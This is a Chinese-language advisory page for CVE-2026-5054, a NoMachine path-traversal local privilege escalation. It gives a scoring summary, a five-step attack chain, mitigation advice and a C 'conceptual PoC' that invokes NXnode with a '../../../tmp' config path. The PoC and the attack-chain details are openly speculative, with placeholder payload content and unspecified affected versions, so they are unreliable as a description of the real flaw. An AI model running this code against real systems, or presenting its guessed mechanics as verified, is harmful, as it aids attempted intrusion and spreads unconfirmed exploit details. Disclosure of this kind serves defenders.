CVE-2026-5054 CVSS 7.8 高危

CVE-2026-5054 NoMachine本地路径操控权限提升漏洞

披露日期: 2026-04-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5054

漏洞类型

路径遍历

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NoMachine

漏洞概述

NoMachine软件存在本地权限提升漏洞。攻击者可利用命令行参数处理中的路径验证缺陷，在获得低权限代码执行能力后，通过操控文件路径在root上下文中执行任意代码，从而完全控制受影响系统。

技术细节

该漏洞的根源在于NoMachine应用程序在处理命令行参数时，未对用户提供的文件路径进行严格的验证和过滤。由于程序直接使用未经验证的路径进行文件操作，攻击者可以通过构造包含特殊字符（如“../”）的路径参数，覆盖系统关键文件或写入恶意配置。由于该服务可能以root权限运行，攻击者借此可从普通用户权限提升至最高管理员权限，实现本地提权。

攻击链分析

STEP 1

初始访问

攻击者首先需要在目标系统上获得低权限用户的访问能力。

STEP 2

漏洞识别

识别NoMachine应用程序中处理命令行参数的代码逻辑，发现路径验证缺失点。

STEP 3

构造载荷

构造包含路径遍历字符（如../）的恶意路径参数，指向攻击者控制的文件。

STEP 4

触发漏洞

以低权限身份运行NoMachine相关进程，传入恶意参数。

STEP 5

权限提升

程序以root权限执行文件操作，导致写入恶意文件或加载恶意库，获得root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>

// Conceptual PoC for CVE-2026-5054
// Exploits lack of path validation in command line arguments

int main() {
    // 1. Create a malicious payload file
    FILE *fp = fopen("/tmp/malicious_payload.txt", "w");
    if (fp) {
        fprintf(fp, "[Malicious Config]\nPrivilege=Root");
        fclose(fp);
    }

    // 2. Construct the path traversal payload
    // The vulnerable app takes a config path argument
    char *exploit_cmd = "/usr/bin/NXnode --config ../../../tmp/malicious_payload.txt";

    // 3. Execute the command
    // If NXnode runs as root and uses the path insecurely, the malicious file is loaded/written.
    system(exploit_cmd);

    return 0;
}

影响范围

NoMachine (受影响版本未明确指定)

防御指南

临时缓解措施

在未安装补丁前，建议暂时禁用NoMachine服务或严格限制本地用户权限。管理员应检查系统日志，排查是否有利用该漏洞的异常提权行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5054
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5054
3 Details https://www.cvedetails.com/cve/CVE-2026-5054/
4 VulDB https://vuldb.com/cve/CVE-2026-5054
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-248/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表